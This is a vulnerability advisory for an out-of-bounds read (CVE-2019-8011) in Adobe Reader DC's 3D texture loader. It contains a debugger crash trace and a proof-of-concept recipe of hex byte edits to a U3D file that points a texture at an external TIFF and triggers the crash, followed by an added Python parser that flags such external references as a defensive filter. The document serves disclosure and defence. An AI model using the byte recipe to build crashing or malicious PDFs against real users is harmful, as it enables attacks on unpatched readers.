
Acrobat Reader DC 2d.x3d!_LoadTIFF() Out-of-Bounds Read

CVE ID

CVE-2019-8011

Tested Versions

  • Adobe Reader DC 2019.010.20099

Product URL(s)

  • https://acrobat.adobe.com/us/en/acrobat.html
  • https://get.adobe.com/reader/

Adobe Acrobat is a family of application software and Web services developed by Adobe Inc. to view, create, manipulate, print and manage files in Portable Document Format (PDF). It provides compatibility with the ECMA-363 Standard (Universal 3D File Format) via 3difr.x3d, 2d.x3d and rt3d.dll, which allow viewing embedded 3D content in PDF files. The ECMA-363 standard allows external texture images to be declared with the Texture Resource Declaration Block, with options to load either JPEG/PNG images embedded in the PDF file or other image types from the local file system. These external image formats include TGA, TIFF, PIC, GIF, BMP, PCX, PPM, IFF, FLI/FLC, RGB, PSD, RLE and CEL. The 2d.x3d module is activated when users choose to enable 3D content display.

Vulnerabilities in this module do not affect a default installation; however, in industry sectors with frequent exchange of 3D PDF files (e.g., CAD designs), 3D content may be enabled by default, leaving users exposed to this attack vector.

Vulnerability

An out-of-bounds read can be observed in the context of the sandboxed process as the logged-on user.

# The debugging and analysis were done on Adobe Reader DC 2019.010.20099.
# The stack trace at crash site:

(106c.1598): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.

eax=000000ff ebx=00000100 ecx=000000fc edx=1da93000 esi=2b213000 edi=1d96f000
eip=5ce6b2a2 esp=0091acac ebp=0091acb8 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
2d!png_set_filter_heuristics+0x7e2f:
5ce6b2a2 668b07          mov     ax,word ptr [edi]        ds:0023:1d96f000=????

0:000> kb 10
 # ChildEBP RetAddr  Args to Child              
WARNING: Stack unwind information not available. Following frames may be wrong.
00 0091acb8 5ce6a974 00000100 1d96eff8 2b212ff8 2d!png_set_filter_heuristics+0x7e2f
01 0091acf0 5ce6a605 20688d38 2b274fd0 5ce6b1e7 2d!png_set_filter_heuristics+0x7501
02 0091ad24 5ce62ab8 22e3cfa8 22dd4e68 30cb4fb0 2d!png_set_filter_heuristics+0x7192
03 0091ad38 57cd77f6 00000006 22e3cfa8 22dd4e68 2d!E3DLLFunc+0xbe5
04 0091ad58 57c9ae58 31da4f90 00000006 22e3cfa8 rt3d!FILETYPE::Func2d+0x5e
05 0091b1e0 57c993ee 35a425a8 0091b698 00000000 rt3d!PrepareRescale+0xac8
06 0091b218 57ccc859 35a425a8 0091b698 00000000 rt3d!GetPicture+0x2e
07 0091b454 57ccd566 35a425a8 0091b698 00000000 rt3d!EndPicturesCache+0x5352
08 0091b8c4 57ccca9b 35a424e8 35a425a8 0091bf0c rt3d!EndPicturesCache+0x605f
09 0091c118 57cccd56 35a424e8 00000000 30cb4fb0 rt3d!EndPicturesCache+0x5594
0a 0091c378 57c7fda5 16c67cb0 30cb4fb0 00000000 rt3d!EndPicturesCache+0x584f
0b 0091c398 57c077ea 00000002 30cb4fb0 b7db0154 rt3d!e3_SCENE::MovePDVToCameraNode+0xfcd
0c 0091c818 57bd3ebd 00000000 30cbcfc8 00000000 rt3d!V4CUnloadRT+0x30b97
0d 0091c830 591a06df 30cbcfc8 00000000 0091c884 rt3d+0x3ebd

Proof of Concept

To load an external image with shading_M.u3d, the relevant bytes of the file are:

000002f0: 28 7c 3f 00 00 00 00 00 14 ff ff ff 3c 00 00 00  (|?.........<...
00000300: 00 00 00 00 05 00 6c 69 6e 65 73 02 00 00 00 00  ......lines.....
00000310: 00 00 00 00 01 00 00 00 55 ff ff ff 1c 00 00 00  ........U.......
00000320: 00 00 00 00 05 00 6c 69 6e 65 73 00 01 00 00 00  ......lines.....
00000330: 01 00 00 0e 01 00 00 00 01 0e 00 00 52 dc 00 00  ............R...

The following modifications need to be made to the above block:

# Modify the containing Modifier Chain Block (0xFFFFFF14) length:
; shading_M.u3d: change data size field to 0x54 from 0x3C

# Texture Resource Declaration Block (0xFFFFFF55):
; shading_M.u3d: change data size field to 0x34 from 0x1A

# 2d.x3d Image Loading construction from shading_M.u3d
; 05 00 6c 69 6e 65 73       // Texture Name String: "lines"
; 00 01 00 00                // U32: Texture Height
; 00 01 00 00                // U32: Texture Width
; 0e                         // U8: Texture Image Type: 0x0E color RGB
; 01 00 00 00                // U32: Continuation Image Count
;                            // Now the Continuation Image Format record
; 01                         //    U8: Compression Type 0x01 JPEG-24
; 0e                         //    U8: Texture Image Channels
; 00 00                      //    U16: Continuation Image Attributes: default
; 52 dc 00 00                //    U32: Image Data Byte Count

# Modify to the following:
; 05 00 6c 69 6e 65 73       // Texture Name String: "lines"
; 00 01 00 00                // U32: Texture Height
; 00 01 00 00                // U32: Texture Width
; 0e                         // U8: Texture Image Type: 0x0E color RGB
; 01 00 00 00                // U32: Continuation Image Count
;                            // Now the Continuation Image Format record:
; 02                         //    U8: Compression Type 0x02 PNG
; 0e                         //    U8: Texture Image Channels
; 01 00                      //    U16: Continuation Image Attributes: external
; 01 00 00 00                //    U32: Image URL Count 1
;                            //    0x16-byte string "httpAAAAAAAsynAA12.tif"
; 16 00 68 74 74 70 41 41 41 41 41 41 41 73 79 6e 41 41 31 32 2e 74 69 66
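
The field walkthrough above is enough to scan a U3D stream for Texture Resource Declaration Blocks that reference external files, which is the condition that makes a document reach the external image loaders in 2d.x3d at all. The parser below is an added example, not code from the advisory or from Adobe; it follows the layout exactly as the advisory lays it out (U16 length-prefixed strings, bit 0x0001 of the attributes marking an external image, Image URL Count replacing Image Data Byte Count when external) and treats the block header as type/data size/metadata size. The two input blocks are reconstructed from the dump and the modified record on this page; their declared data sizes (0x1C and 0x34) are checked against the bytes actually consumed.

```python
import struct

TEXTURE_DECL_BLOCK = 0xFFFFFF55  # block type from the advisory
ATTR_EXTERNAL = 0x0001           # attribute value the advisory uses for "external"

def _read_string(buf, off):
    """U3D string: U16 little-endian byte length followed by the bytes."""
    (n,) = struct.unpack_from("<H", buf, off)
    off += 2
    return buf[off:off + n].decode("latin-1"), off + n

def parse_texture_block(block):
    """Parse one Texture Resource Declaration Block (header + data).

    Layout follows the advisory's byte walkthrough; the block header
    (type, data size, metadata size) is assumed to be three U32s.
    """
    btype, data_size, _meta = struct.unpack_from("<III", block, 0)
    if btype != TEXTURE_DECL_BLOCK:
        raise ValueError("not a texture declaration block: 0x%08X" % btype)
    start = off = 12
    name, off = _read_string(block, off)
    height, width = struct.unpack_from("<II", block, off)
    off += 8
    img_type = block[off]
    off += 1
    (count,) = struct.unpack_from("<I", block, off)
    off += 4
    images = []
    for _ in range(count):  # one Continuation Image Format record each
        comp, chans, attrs = struct.unpack_from("<BBH", block, off)
        off += 4
        img = {"compression": comp, "channels": chans,
               "external": bool(attrs & ATTR_EXTERNAL), "urls": []}
        if img["external"]:  # URL count + URL strings instead of a byte count
            (nurls,) = struct.unpack_from("<I", block, off)
            off += 4
            for _ in range(nurls):
                url, off = _read_string(block, off)
                img["urls"].append(url)
        else:
            (img["byte_count"],) = struct.unpack_from("<I", block, off)
            off += 4
        images.append(img)
    return {"name": name, "height": height, "width": width, "type": img_type,
            "declared_size": data_size, "consumed": off - start,
            "size_ok": (off - start) == data_size, "images": images}

def external_texture_refs(block):
    """Every external file/URL the block would make the viewer fetch."""
    return [u for img in parse_texture_block(block)["images"] for u in img["urls"]]

# Constructed from the advisory: original embedded-JPEG block (0x1C data bytes).
ORIGINAL = bytes.fromhex("55ffffff 1c000000 00000000 0500 6c696e6573 00010000"
                         " 00010000 0e 01000000 01 0e 0000 52dc0000")
# Constructed from the advisory: modified block with an external .tif (0x34 bytes).
MODIFIED = bytes.fromhex("55ffffff 34000000 00000000 0500 6c696e6573 00010000"
                         " 00010000 0e 01000000 02 0e 0100 01000000 1600"
                         " 68747470 41414141414141 73796e 4141 3132 2e746966")
```

Running `external_texture_refs` over every 0xFFFFFF55 block in a document's U3D streams is a cheap pre-filter for content that should be reviewed before 3D display is enabled.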

Vendor Response

The vendor has acknowledged the issue and released an update to address it.

The vendor’s advisory can be found here: APSB19-41.

Timeline

  • 2019-05-07 Vendor disclosure
  • 2019-08-13 Vendor patched

Credit

Discovered by Wei Lei
